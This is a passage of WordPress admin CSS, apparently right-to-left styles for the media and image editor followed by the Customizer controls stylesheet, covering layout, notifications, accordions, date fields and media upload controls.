0;color:var(--wp-admin-theme-color);font-size:20px;line-height:1;cursor:pointer;box-sizing:content-box;box-shadow:none}.image-editor .imgedit-settings .imgedit-help-toggle:focus{color:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 1px var(--wp-admin-theme-color);outline:2px solid transparent}.form-table td.imgedit-response{padding:0}.imgedit-submit-btn{margin-left:20px}.imgedit-wrap .nowrap{white-space:nowrap;font-size:12px;line-height:inherit}span.imgedit-scale-warn{display:flex;align-items:center;margin:4px;gap:4px;color:#b32d2e;font-style:normal;visibility:hidden;vertical-align:middle}.imgedit-save-target{margin:8px 0}.imgedit-save-target legend{font-weight:600}.imgedit-group{margin-bottom:20px}.image-editor .imgedit-original-dimensions{display:inline-block}.image-editor .imgedit-crop-ratio input[type=number],.image-editor .imgedit-crop-ratio input[type=text],.image-editor .imgedit-crop-sel input[type=number],.image-editor .imgedit-crop-sel input[type=text],.image-editor .imgedit-scale-controls input[type=number],.image-editor .imgedit-scale-controls input[type=text]{width:80px;font-size:14px;padding:0 8px}.imgedit-separator{display:inline-block;width:7px;text-align:center;font-size:13px;color:#3c434a}.image-editor .imgedit-scale-button-wrapper{margin-top:.3077em;display:block}.image-editor .imgedit-scale-controls .button{margin-bottom:0}audio,video{display:inline-block;max-width:100%}.wp-core-ui .mejs-container{width:100%;max-width:100%}.wp-core-ui .mejs-container *{box-sizing:border-box}.wp-core-ui .mejs-time{box-sizing:content-box}@media print,(min-resolution:120dpi){.imgedit-wait:before{background-image:url(../images/spinner-2x.gif)}}@media screen and (max-width:782px){.edit-attachment-frame input,.edit-attachment-frame textarea{line-height:1.5}.wp_attachment_details label[for=content]{font-size:14px;line-height:1.5}.wp_attachment_details textarea{line-height:1.5}.wp_attachment_details #attachment_alt{height:3.375em}.media-upload-form .media-item .error,.media-upload-form .media-item.error{font-size:13px;line-height:1.5}.media-upload-form .media-item.error{padding:1px 10px}.media-upload-form .media-item .error{padding:10px 0 10px 12px}.image-editor .imgedit-crop-ratio input[type=text],.image-editor .imgedit-crop-sel input[type=text],.image-editor .imgedit-scale input[type=text]{font-size:16px;padding:6px 10px}.wp_attachment_holder .imgedit-wrap .image-editor,.wp_attachment_holder .imgedit-wrap .imgedit-panel-content{float:none;width:auto;max-width:none;padding-bottom:16px}.copy-to-clipboard-container .success{font-size:14px}.imgedit-crop-wrap img{width:100%}.media-modal .imgedit-wrap .image-editor,.media-modal .imgedit-wrap .imgedit-panel-content{position:initial!important}.media-modal .imgedit-wrap .image-editor{box-sizing:border-box;width:100%!important}.image-editor .imgedit-scale-button-wrapper{display:inline-block}}@media only screen and (max-width:600px){.media-item-wrapper{grid-template-columns:1fr}}@media only screen and (max-width:1120px){#wp-media-grid .wp-filter .attachment-filters{max-width:100%}}@media only screen and (max-width:1000px){.wp-filter p.search-box{float:none;width:100%;display:flex;flex-wrap:nowrap;column-gap:0}.wp-filter p.search-box #media-search-input{width:100%}}@media only screen and (max-width:782px){.media-frame.mode-select .attachments-browser.fixed .media-toolbar{top:46px;right:10px}.media-frame.mode-grid .media-toolbar select{min-height:40px;padding:0 24px 0 12px}.media-frame.mode-grid .media-toolbar input[type=search]{min-height:40px;padding:0 12px}.wp-filter p.search-box{margin-bottom:0}}@media only screen and (max-width:600px){.media-frame.mode-select .attachments-browser.fixed .media-toolbar{top:0}}@media only screen and (max-width:480px){.edit-attachment-frame .media-frame-title{right:110px}.edit-attachment-frame .edit-media-header .left,.edit-attachment-frame .edit-media-header .right,.upload-php .media-modal-close{width:40px;height:40px}.edit-attachment-frame .edit-media-header .left:before,.edit-attachment-frame .edit-media-header .right:before{line-height:40px!important}.edit-attachment-frame .edit-media-header .left{right:82px}.edit-attachment-frame .edit-media-header .right{right:41px}.edit-attachment-frame .media-frame-content{top:40px}.edit-attachment-frame .attachment-media-view{float:none;height:auto;width:100%}.edit-attachment-frame .attachment-info{height:auto;width:100%}}@media only screen and (max-width:640px),screen and (max-height:400px){.upload-php .mode-grid .media-sidebar{max-width:100%}}@media only screen and (max-width:375px){.media-item .attachment-tools{align-items:baseline}.media-item .edit-attachment.copy-to-clipboard-container{flex-direction:column}.copy-to-clipboard-container .success{line-height:normal;margin-top:10px}}/*! This file is auto-generated */ body { overflow: hidden; -webkit-text-size-adjust: 100%; } .customize-controls-close, .widget-control-actions a { text-decoration: none; } #customize-controls h3 { font-size: 14px; } #customize-controls img { max-width: 100%; } #customize-controls .submit { text-align: center; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked { background-color: rgba(0, 0, 0, 0.7); padding: 25px; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .customize-changeset-locked-message { margin-right: auto; margin-left: auto; max-width: 366px; min-height: 64px; width: auto; padding: 25px; position: relative; background: #fff; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); line-height: 1.5; overflow-y: auto; text-align: right; top: calc( 50% - 100px ); } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .customize-changeset-locked-message.has-avatar { padding-right: 109px; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .currently-editing { margin-top: 0; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .action-buttons { margin-bottom: 0; } .customize-changeset-locked-avatar { width: 64px; position: absolute; right: 25px; top: 25px; } .wp-core-ui.wp-customizer .customize-changeset-locked-message a.button { margin-left: 10px; margin-top: 0; } #customize-controls .description { color: #50575e; } #customize-save-button-wrapper { float: left; margin-top: 7px; /* Vertically center 32px button in 45px header */ } body:not(.ready) #customize-save-button-wrapper .save { visibility: hidden; } #customize-save-button-wrapper .save { float: right; border-radius: 3px; box-shadow: none; /* @todo Adjust box shadow based on the disable states of paired button. */ margin-top: 0; } #customize-save-button-wrapper .save.has-next-sibling { border-radius: 0 3px 3px 0; } #customize-sidebar-outer-content { position: absolute; top: 0; bottom: 0; right: 0; visibility: hidden; overflow-x: hidden; overflow-y: auto; width: 100%; margin: 0; z-index: -1; background: #f0f0f1; transition: right .18s; border-left: 1px solid #dcdcde; border-right: 1px solid #dcdcde; height: 100%; } @media (prefers-reduced-motion: reduce) { #customize-sidebar-outer-content { transition: none; } } #customize-theme-controls .control-section-outer { display: none !important; } #customize-outer-theme-controls .accordion-section-content { padding: 12px; } #customize-outer-theme-controls .accordion-section-content.open { display: block; } .outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content { visibility: visible; right: 100%; transition: right .18s; } @media (prefers-reduced-motion: reduce) { .outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content { transition: none; } } .customize-outer-pane-parent { margin: 0; } .outer-section-open .wp-full-overlay.expanded .wp-full-overlay-main { right: 300px; opacity: 0.4; } .outer-section-open .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main, .outer-section-open .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-menu-items .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main, .adding-menu-items .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-widget .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main, .adding-widget .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main { right: 64%; } #customize-outer-theme-controls li.notice { padding-top: 8px; padding-bottom: 8px; margin-right: 0; margin-bottom: 10px; } #publish-settings { text-indent: 0; border-radius: 3px 0 0 3px; padding-right: 0; padding-left: 0; box-shadow: none; /* @todo Adjust box shadow based on the disable states of paired button. */ font-size: 14px; width: 30px; float: right; transform: none; margin-top: 0; line-height: 2; } body:not(.ready) #publish-settings, body.trashing #customize-save-button-wrapper .save, body.trashing #publish-settings { display: none; } #customize-header-actions .spinner { margin-top: 13px; /* Vertically center 20px spinner in 45px header */ margin-left: 4px; } .saving #customize-header-actions .spinner, .trashing #customize-header-actions .spinner { visibility: visible; } #customize-header-actions { border-bottom: 1px solid #dcdcde; } #customize-controls .wp-full-overlay-sidebar-content { overflow-y: auto; overflow-x: hidden; } .outer-section-open #customize-controls .wp-full-overlay-sidebar-content { background: #f0f0f1; } #customize-controls .customize-info { border: none; border-bottom: 1px solid #dcdcde; margin-bottom: 15px; } #customize-control-changeset_status .customize-inside-control-row, #customize-control-changeset_preview_link input { background-color: #fff; border-bottom: 1px solid #dcdcde; box-sizing: content-box; width: 100%; margin-right: -12px; padding-right: 12px; padding-left: 12px; } #customize-control-trash_changeset { margin-top: 20px; } #customize-control-trash_changeset .button-link { position: relative; padding-right: 24px; display: inline-block; } #customize-control-trash_changeset .button-link:before { content: "\f182"; content: "\f182" / ''; font: normal 22px dashicons; text-decoration: none; position: absolute; right: 0; top: -2px; } #customize-controls .date-input:invalid { border-color: #d63638; } #customize-control-changeset_status .customize-inside-control-row { padding-top: 10px; padding-bottom: 10px; font-weight: 500; } #customize-control-changeset_status .customize-inside-control-row:first-of-type { border-top: 1px solid #dcdcde; } #customize-control-changeset_status .customize-control-title { margin-bottom: 6px; } #customize-control-changeset_status input { margin-right: 0; } #customize-control-changeset_preview_link { position: relative; display: block; } .preview-link-wrapper .customize-copy-preview-link.preview-control-element.button { margin: 0; position: absolute; top: 50%; transform: translateY(-50%) !important; left: 0; background: #fff !important; } .preview-link-wrapper { position: relative; } .customize-copy-preview-link:before, .customize-copy-preview-link:after { content: ""; height: 40px; position: absolute; background: #fff; top: 0; } .customize-copy-preview-link:before { right: -10px; width: 9px; opacity: 0.75; } .customize-copy-preview-link:after { right: -5px; width: 4px; opacity: 0.8; } #customize-control-changeset_preview_link input { line-height: 2.85714286; /* 40px */ border-top: 1px solid #dcdcde; border-right: none; border-left: none; text-indent: -999px; color: #fff; /* Only necessary for IE11 */ min-height: 40px; } #customize-control-changeset_preview_link label { position: relative; display: block; } #customize-control-changeset_preview_link a { display: inline-block; position: absolute; white-space: nowrap; overflow: hidden; width: 90%; bottom: 14px; font-size: 14px; text-decoration: none; } #customize-control-changeset_preview_link a.disabled, #customize-control-changeset_preview_link a.disabled:active, #customize-control-changeset_preview_link a.disabled:focus, #customize-control-changeset_preview_link a.disabled:visited { color: #000; opacity: 0.4; cursor: default; outline: none; box-shadow: none; } #sub-accordion-section-publish_settings .customize-section-description-container { display: none; } #customize-controls .customize-info.section-meta { margin-bottom: 15px; } .customize-control-date_time .customize-control-description + .date-time-fields.includes-time { margin-top: 10px; } .customize-control.customize-control-date_time .date-time-fields .date-input.day { margin-left: 0; } .date-time-fields .date-input.month { width: auto; margin: 0; } .date-time-fields .date-input.day, .date-time-fields .date-input.hour, .date-time-fields .date-input.minute { width: 46px; } .customize-control-date_time select { vertical-align: top; } .date-time-fields .date-input.year { width: 65px; } .date-time-fields .date-input.meridian { width: auto; margin: 0; } .date-time-fields .time-row { margin-top: 12px; } #customize-control-changeset_preview_link { margin-top: 6px; } #customize-control-changeset_status { margin-bottom: 0; padding-bottom: 0; } #customize-control-changeset_scheduled_date { box-sizing: content-box; width: 100%; margin-right: -12px; padding: 12px; background: #fff; border-bottom: 1px solid #dcdcde; margin-bottom: 0; } #customize-control-site_icon .customize-control-description, #customize-control-changeset_scheduled_date .customize-control-description { font-style: normal; } #customize-controls .customize-info.is-in-view, #customize-controls .customize-section-title.is-in-view { position: absolute; z-index: 9; width: 100%; box-shadow: 0 1px 0 rgba(0, 0, 0, 0.1); } #customize-controls .customize-section-title.is-in-view { margin-top: 0; } #customize-controls .customize-info.is-in-view + .accordion-section { margin-top: 15px; } #customize-controls .customize-info.is-sticky, #customize-controls .customize-section-title.is-sticky { position: fixed; top: 46px; } #customize-controls .customize-info .accordion-section-title { background: #fff; color: #50575e; border-right: none; border-left: none; border-bottom: none; cursor: default; padding: 10px 14px 11px 10px; } #customize-controls .customize-info.open .accordion-section-title:after, #customize-controls .customize-info .accordion-section-title:hover:after, #customize-controls .customize-info .accordion-section-title:focus:after { color: #2c3338; } #customize-controls .customize-info .accordion-section-title:after { display: none; } #customize-controls .customize-info .preview-notice { font-size: 13px; line-height: 1.9; margin: 0; font-weight: 400; color: #50575e; } #customize-controls .customize-pane-child .customize-section-title h3, #customize-controls .customize-pane-child h3.customize-section-title, #customize-outer-theme-controls .customize-pane-child .customize-section-title h3, #customize-outer-theme-controls .customize-pane-child h3.customize-section-title, #customize-controls .customize-info .panel-title { font-size: 20px; font-weight: 200; line-height: 26px; display: block; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #customize-controls .customize-section-title span.customize-action { overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #customize-controls .customize-info .customize-help-toggle { position: absolute; top: 4px; left: 1px; padding: 20px 10px 10px 20px; width: 20px; height: 20px; cursor: pointer; box-shadow: none; background: transparent; color: #50575e; border: none; } #customize-controls .customize-info .customize-help-toggle:before { position: absolute; top: 5px; right: 6px; } #customize-controls .customize-info .customize-panel-description, #customize-controls .customize-info .customize-section-description, #customize-outer-theme-controls .customize-info .customize-section-description, #customize-controls .no-widget-areas-rendered-notice { color: #50575e; display: none; background: #fff; padding: 12px 15px; border-top: 1px solid #dcdcde; } #customize-controls .customize-info .customize-panel-description.open + .no-widget-areas-rendered-notice { border-top: none; } .no-widget-areas-rendered-notice { font-style: italic; } .no-widget-areas-rendered-notice p:first-child { margin-top: 0; } .no-widget-areas-rendered-notice p:last-child { margin-bottom: 0; } #customize-controls .customize-info .customize-section-description { margin-bottom: 15px; } #customize-controls .customize-info .customize-panel-description p:first-child, #customize-controls .customize-info .customize-section-description p:first-child { margin-top: 0; } #customize-controls .customize-info .customize-panel-description p:last-child, #customize-controls .customize-info .customize-section-description p:last-child { margin-bottom: 0; } #customize-controls .current-panel .control-section > h3.accordion-section-title { padding-left: 30px; } #customize-theme-controls .control-section, #customize-outer-theme-controls .control-section { border: none; } #customize-theme-controls .accordion-section-title, #customize-outer-theme-controls .accordion-section-title { color: #50575e; background-color: #fff; border-bottom: 1px solid #dcdcde; border-right: 4px solid #fff; transition: .15s color ease-in-out, .15s background-color ease-in-out, .15s border-color ease-in-out; } .accordion-section-title:has(button.accordion-trigger), #customize-controls .current-panel .control-section > h3.accordion-section-title:has(button.accordion-trigger) { padding: 0; } .accordion-section-title button.accordion-trigger { all: unset; width: 100%; padding: 10px 14px 11px 30px; display: flex; align-items: center; box-sizing: border-box; } .accordion-section-title button.accordion-trigger:has(.menu-in-location) { display: block; } .accordion-section-title button.accordion-trigger .spinner { margin-top: 0; } @media (prefers-reduced-motion: reduce) { #customize-theme-controls .accordion-section-title, #customize-outer-theme-controls .accordion-section-title { transition: none; } } #customize-controls #customize-theme-controls .customize-themes-panel .accordion-section-title { color: #50575e; background-color: #fff; border-right: 4px solid #fff; } #customize-theme-controls .accordion-section-title:after, #customize-outer-theme-controls .accordion-section-title:after { content: "\f341"; content: "\f345" / ''; color: #a7aaad; pointer-events: none; } #customize-theme-controls .accordion-section-content, #customize-outer-theme-controls .accordion-section-content { color: #50575e; background: transparent; } #accordion-section-themes + .control-section { border-top: 1px solid #dcdcde; } .js .control-section:hover .accordion-section-title, .js .control-section .accordion-section-title:hover, .js .control-section.open .accordion-section-title, .js .control-section .accordion-section-title:focus { background: #f6f7f7; } #customize-theme-controls .control-section.open { border-bottom: 1px solid #f0f0f1; } #customize-theme-controls .control-section.open .accordion-section-title, #customize-outer-theme-controls .control-section.open .accordion-section-title { border-bottom-color: #f0f0f1 !important; } #customize-theme-controls .control-section:last-of-type.open, #customize-theme-controls .control-section:last-of-type > .accordion-section-title { border-bottom-color: #dcdcde; } #customize-theme-controls .control-panel-content:not(.control-panel-nav_menus) .control-section:nth-child(2), #customize-theme-controls .control-panel-nav_menus .control-section-nav_menu, #customize-theme-controls .control-section-nav_menu_locations .accordion-section-title { border-top: 1px solid #dcdcde; } #customize-theme-controls .control-panel-nav_menus .control-section-nav_menu + .control-section-nav_menu { border-top: none; } #customize-theme-controls > ul { margin: 0; } #customize-theme-controls .accordion-section-content { position: absolute; top: 0; right: 100%; width: 100%; margin: 0; padding: 12px; box-sizing: border-box; } #customize-info, #customize-theme-controls .customize-pane-parent, #customize-theme-controls .customize-pane-child { overflow: visible; width: 100%; margin: 0; padding: 0; box-sizing: border-box; transition: 0.18s transform cubic-bezier(0.645, 0.045, 0.355, 1); /* easeInOutCubic */ } @media (prefers-reduced-motion: reduce) { #customize-info, #customize-theme-controls .customize-pane-parent, #customize-theme-controls .customize-pane-child { transition: none; } } #customize-theme-controls .customize-pane-child.skip-transition { transition: none; } #customize-info, #customize-theme-controls .customize-pane-parent { position: relative; visibility: visible; height: auto; max-height: none; overflow: auto; transform: none; } #customize-theme-controls .customize-pane-child { position: absolute; top: 0; right: 0; visibility: hidden; height: 0; max-height: none; overflow: hidden; transform: translateX(-100%); } #customize-theme-controls .customize-pane-child.open, #customize-theme-controls .customize-pane-child.current-panel { transform: none; } .section-open #customize-theme-controls .customize-pane-parent, .in-sub-panel #customize-theme-controls .customize-pane-parent, .section-open #customize-info, .in-sub-panel #customize-info, .in-sub-panel.section-open #customize-theme-controls .customize-pane-child.current-panel { visibility: hidden; height: 0; overflow: hidden; transform: translateX(100%); } .section-open #customize-theme-controls .customize-pane-parent.busy, .in-sub-panel #customize-theme-controls .customize-pane-parent.busy, .section-open #customize-info.busy, .in-sub-panel #customize-info.busy, .busy.section-open.in-sub-panel #customize-theme-controls .customize-pane-child.current-panel, #customize-theme-controls .customize-pane-child.open, #customize-theme-controls .customize-pane-child.current-panel, #customize-theme-controls .customize-pane-child.busy { visibility: visible; height: auto; overflow: auto; } #customize-theme-controls .customize-pane-child.accordion-section-content, #customize-theme-controls .customize-pane-child.accordion-sub-container { display: block; overflow-x: hidden; } #customize-theme-controls .customize-pane-child.accordion-section-content { padding: 12px; } #customize-theme-controls .customize-pane-child.menu li { position: static; } .customize-section-description-container, .control-section-nav_menu .customize-section-description-container, .control-section-new_menu .customize-section-description-container { margin-bottom: 15px; } .control-section-nav_menu .customize-control, .control-section-new_menu .customize-control { /* Override default `margin-bottom` for `.customize-control` */ margin-bottom: 0; } .customize-section-title { margin: -12px -12px 0; border-bottom: 1px solid #dcdcde; background: #fff; } div.customize-section-description { margin-top: 22px; } .customize-info div.customize-section-description { margin-top: 0; } div.customize-section-description p:first-child { margin-top: 0; } div.customize-section-description p:last-child { margin-bottom: 0; } #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child { border-bottom: 1px solid #dcdcde; padding: 12px; } .ios #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child { padding: 12px 12px 13px; } .customize-section-title h3, h3.customize-section-title { padding: 10px 14px 12px 10px; margin: 0; line-height: 21px; color: #50575e; } .accordion-sub-container.control-panel-content { display: none; position: absolute; top: 0; width: 100%; } .accordion-sub-container.control-panel-content.busy { display: block; } .current-panel .accordion-sub-container.control-panel-content { width: 100%; } .customize-controls-close { display: block; position: absolute; top: 0; right: 0; width: 45px; height: 41px; padding: 0 0 0 2px; background: #f0f0f1; border: none; border-top: 4px solid #f0f0f1; border-left: 1px solid #dcdcde; color: #3c434a; text-align: right; cursor: pointer; box-sizing: content-box; } @media (prefers-reduced-motion: no-preference) { .customize-controls-close { transition: color .15s ease-in-out, border-color .15s ease-in-out, background .15s ease-in-out; } } .customize-panel-back, .customize-section-back { display: block; float: right; width: 48px; height: 71px; padding: 0 0 0 24px; margin: 0; background: #fff; border: none; border-left: 1px solid #dcdcde; border-right: 4px solid #fff; box-shadow: none; cursor: pointer; transition: color .15s ease-in-out, border-color .15s ease-in-out, background .15s ease-in-out; } .customize-section-back { height: 74px; } .ios .customize-panel-back { display: none; } .ios .expanded.in-sub-panel .customize-panel-back { display: block; } #customize-controls .panel-meta.customize-info .accordion-section-title { margin-right: 48px; border-right: none; } #customize-controls .panel-meta.customize-info .accordion-section-title:hover, #customize-controls .cannot-expand:hover .accordion-section-title { background: #fff; color: #50575e; border-right-color: #fff; } .customize-controls-close:focus, .customize-controls-close:hover, .customize-controls-preview-toggle:focus, .customize-controls-preview-toggle:hover { background: #fff; box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } #customize-theme-controls .accordion-section-title:focus .customize-action { /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; outline-offset: 1px; } .customize-panel-back:hover, .customize-panel-back:focus, .customize-section-back:hover, .customize-section-back:focus { background: #f6f7f7; box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .customize-controls-close:before { font: normal 22px/45px dashicons; content: "\f335"; content: "\f335" / ''; position: relative; top: -3px; right: 13px; } .customize-panel-back:before, .customize-section-back:before { font: normal 20px/72px dashicons; content: "\f345"; content: "\f341" / ''; position: relative; right: 9px; } .wp-full-overlay-sidebar .wp-full-overlay-header { background-color: #f0f0f1; transition: padding ease-in-out .18s; } .in-sub-panel .wp-full-overlay-sidebar .wp-full-overlay-header { padding-right: 62px; } p.customize-section-description { font-style: normal; margin-top: 22px; margin-bottom: 0; } .customize-section-description ul { margin-right: 1em; } .customize-section-description ul > li { list-style: disc; } .section-description-buttons { text-align: left; } .customize-control { width: 100%; float: right; clear: both; margin-bottom: 12px; } .customize-control input[type="text"], .customize-control input[type="password"], .customize-control input[type="email"], .customize-control input[type="number"], .customize-control input[type="search"], .customize-control input[type="tel"], .customize-control input[type="url"], .customize-control input[type="range"] { width: 100%; margin: 0; } .customize-control-hidden { margin: 0; } .customize-control-textarea textarea { width: 100%; resize: vertical; } .customize-control select { width: 100%; } .customize-control select[multiple] { height: auto; } .customize-control-title { display: block; font-size: 14px; line-height: 1.75; font-weight: 600; margin-bottom: 4px; } .customize-control-description { display: block; font-style: italic; line-height: 1.4; margin-top: 0; margin-bottom: 5px; } .customize-section-description a.external-link:after { font: 16px/11px dashicons; content: "\f504"; content: "\f504" / ''; top: 3px; position: relative; padding-right: 3px; display: inline-block; text-decoration: none; } .customize-control-color .color-picker, .customize-control-upload div { line-height: 28px; } .customize-control .customize-inside-control-row { line-height: 1.6; display: block; margin-right: 24px; padding-top: 6px; padding-bottom: 6px; } .customize-control-radio input, .customize-control-checkbox input, .customize-control-nav_menu_auto_add input { margin-left: 4px; margin-right: -24px; } .customize-control-radio { padding: 5px 0 10px; } .customize-control-radio .customize-control-title { margin-bottom: 0; line-height: 1.6; } .customize-control-radio .customize-control-title + .customize-control-description { margin-top: 7px; } .customize-control-radio label, .customize-control-checkbox label { vertical-align: top; } .customize-control .attachment-thumb.type-icon { float: right; margin: 10px; width: auto; } .customize-control .attachment-title { font-weight: 600; margin: 0; padding: 5px 10px; } .customize-control .attachment-meta { white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin: 0; padding: 0 10px; } .customize-control .attachment-meta-title { padding-top: 7px; } /* Remove descender space. */ .customize-control .thumbnail-image, .customize-control-header .current, .customize-control .wp-media-wrapper.wp-video { line-height: 0; } .customize-control .thumbnail-image img { cursor: pointer; } #customize-controls .thumbnail-audio .thumbnail { max-width: 64px; max-height: 64px; margin: 10px; float: right; } #available-menu-items .accordion-section-content .new-content-item-wrapper, .customize-control-dropdown-pages .new-content-item-wrapper { width: calc(100% - 30px); padding: 8px 15px; position: absolute; bottom: 0; z-index: 10; background: #f0f0f1; } .customize-control-dropdown-pages .new-content-item-wrapper { width: 100%; padding: 0; position: static; } #available-menu-items .new-content-item-wrapper > label, .customize-control-dropdown-pages .new-content-item-wrapper > label { margin-bottom: 4px; display: block; } #available-menu-items .accordion-section-content .new-content-item, .customize-control-dropdown-pages .new-content-item { display: flex; } .customize-control-dropdown-pages .new-content-item { width: 100%; padding: 5px 1px 5px 0; position: relative; } .customize-control-dropdown-pages .new-content-item-wrapper .new-content-item { padding: 0; } .customize-control-dropdown-pages .new-content-item-wrapper .new-content-item label { line-height: 1.6; } #available-menu-items .new-content-item .create-item-input, .customize-control-dropdown-pages .new-content-item .create-item-input { flex-grow: 10; width: 100%; } #available-menu-items .new-content-item .create-item-input { min-height: 32px; line-height: 2.15384615; /* 28px for 32px min-height with 13px font */ } #available-menu-items .new-content-item .add-content, .customize-control-dropdown-pages .new-content-item .add-content { margin: 0 6px 0 0; flex-grow: 1; } #available-menu-items .new-content-item .add-content { min-height: 32px; line-height: 2.30769231; /* 30px for 32px min-height with 13px font */ } .customize-control-dropdown-pages .new-content-item .create-item-input.invalid { border: 1px solid #d63638; } .customize-control-dropdown-pages .add-new-toggle { margin-right: 1px; font-weight: 600; line-height: 2.2; } #customize-preview iframe { width: 100%; height: 100%; position: absolute; } #customize-preview iframe + iframe { visibility: hidden; } .wp-full-overlay-sidebar { background: #f0f0f1; border-left: 1px solid #dcdcde; } /** * Notifications */ #customize-controls .customize-control-notifications-container { /* Scoped to #customize-controls for specificity over notification styles in common.css. */ margin: 4px 0 8px; padding: 0; cursor: default; } #customize-controls .customize-control-widget_form.has-error .widget .widget-top, .customize-control-nav_menu_item.has-error .menu-item-bar .menu-item-handle { box-shadow: inset 0 0 0 2px #d63638; transition: .15s box-shadow linear; } #customize-controls .customize-control-notifications-container li.notice { list-style: none; margin: 0 0 6px; padding: 9px 14px; overflow: hidden; } #customize-controls .customize-control-notifications-container .notice.is-dismissible { padding-left: 38px; } .customize-control-notifications-container li.notice:last-child { margin-bottom: 0; } #customize-controls .customize-control-nav_menu_item .customize-control-notifications-container { margin-top: 0; } #customize-controls .customize-control-widget_form .customize-control-notifications-container { margin-top: 8px; } .customize-control-text.has-error input { outline: 2px solid #d63638; } #customize-controls #customize-notifications-area { position: absolute; top: 46px; width: 100%; border-bottom: 1px solid #dcdcde; display: block; padding: 0; margin: 0; } .wp-full-overlay.collapsed #customize-controls #customize-notifications-area { display: none !important; } #customize-controls #customize-notifications-area:not(.has-overlay-notifications), #customize-controls .customize-section-title > .customize-control-notifications-container:not(.has-overlay-notifications), #customize-controls .panel-meta > .customize-control-notifications-container:not(.has-overlay-notifications) { max-height: 210px; overflow-x: hidden; overflow-y: auto; } #customize-controls #customize-notifications-area > ul, #customize-controls #customize-notifications-area .notice, #customize-controls .panel-meta > .customize-control-notifications-container, #customize-controls .panel-meta > .customize-control-notifications-container .notice, #customize-controls .customize-section-title > .customize-control-notifications-container, #customize-controls .customize-section-title > .customize-control-notifications-container .notice { margin: 0; } #customize-controls .panel-meta > .customize-control-notifications-container, #customize-controls .customize-section-title > .customize-control-notifications-container { border-top: 1px solid #dcdcde; } #customize-controls #customize-notifications-area .notice, #customize-controls .panel-meta > .customize-control-notifications-container .notice, #customize-controls .customize-section-title > .customize-control-notifications-container .notice { padding: 9px 14px; } #customize-controls #customize-notifications-area .notice.is-dismissible, #customize-controls .panel-meta > .customize-control-notifications-container .notice.is-dismissible, #customize-controls .customize-section-title > .customize-control-notifications-container .notice.is-dismissible { padding-left: 38px; } #customize-controls #customize-notifications-area .notice + .notice, #customize-controls .panel-meta > .customize-control-notifications-container .notice + .notice, #customize-controls .customize-section-title > .customize-control-notifications-container .notice + .notice { margin-top: 1px; } @keyframes customize-fade-in { 0% { opacity: 0; } 100% { opacity: 1; } } #customize-controls .notice.notification-overlay, #customize-controls #customize-notifications-area .notice.notification-overlay { margin: 0; border-right: 0; /* @todo Appropriate styles could be added for notice-error, notice-warning, notice-success, etc */ } #customize-controls .customize-control-notifications-container.has-overlay-notifications { animation: customize-fade-in 0.5s; z-index: 30; } /* Note: Styles for this are also defined in themes.css */ #customize-controls #customize-notifications-area .notice.notification-overlay .notification-message { clear: both; color: #1d2327; font-size: 18px; font-style: normal; margin: 0; padding: 2em 0; text-align: center; width: 100%; display: block; top: 50%; position: relative; } /* Style for custom settings */ /** * Static front page */ #customize-control-show_on_front.has-error { margin-bottom: 0; } #customize-control-show_on_front.has-error .customize-control-notifications-container { margin-top: 12px; } /** * Dropdowns */ .accordion-section .dropdown { float: right; display: block; position: relative; cursor: pointer; } .accordion-section .dropdown-content { overflow: hidden; float: right; min-width: 30px; height: 16px; line-height: 16px; margin-left: 16px; padding: 4px 5px; border: 2px solid #f0f0f1; -webkit-user-select: none; user-select: none; } /* @todo maybe no more used? */ .customize-control .dropdown-arrow { position: absolute; top: 0; bottom: 0; left: 0; width: 20px; background: #f0f0f1; } .customize-control .dropdown-arrow:after { content: "\f140"; content: "\f140" / ''; font: normal 20px/1 dashicons; display: block; padding: 0; text-indent: 0; text-align: center; position: relative; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #2c3338; } .customize-control .dropdown-status { color: #2c3338; background: #f0f0f1; display: none; max-width: 112px; } .customize-control-color .dropdown { margin-left: 5px; margin-bottom: 5px; } .customize-control-color .dropdown .dropdown-content { background-color: #50575e; border: 1px solid rgba(0, 0, 0, 0.15); } .customize-control-color .dropdown:hover .dropdown-content { border-color: rgba(0, 0, 0, 0.25); } /** * iOS can't scroll iframes, * instead it expands the iframe size to match the size of the content */ .ios .wp-full-overlay { position: relative; } .ios #customize-controls .wp-full-overlay-sidebar-content { -webkit-overflow-scrolling: touch; } /* Media controls */ .customize-control .actions .button { margin-top: 12px; } .customize-control-header .actions, .customize-control-header .uploaded { margin-bottom: 18px; } .customize-control-header .uploaded button:not(.random), .customize-control-header .default button:not(.random) { width: 100%; padding: 0; margin: 0; background: none; border: none; color: inherit; cursor: pointer; } .customize-control-header button img { display: block; } .customize-control .attachment-media-view .remove-button, .customize-control .attachment-media-view .default-button, .customize-control .attachment-media-view .upload-button, .customize-control-header button.new, .customize-control-header button.remove { width: auto; height: auto; white-space: normal; } .customize-control .attachment-media-view .upload-button { width: 100%; text-align: center; } .customize-control .attachment-media-view .upload-button.control-focus { width: auto; } .customize-control.customize-control-header .actions .upload-button.button.new { width: 100%; text-align: center; } .customize-control .attachment-media-view .thumbnail, .customize-control-header .current .container { overflow: hidden; } .customize-control .attachment-media-view .placeholder, .customize-control .attachment-media-view .button-add-media, .customize-control-header .placeholder { width: 100%; position: 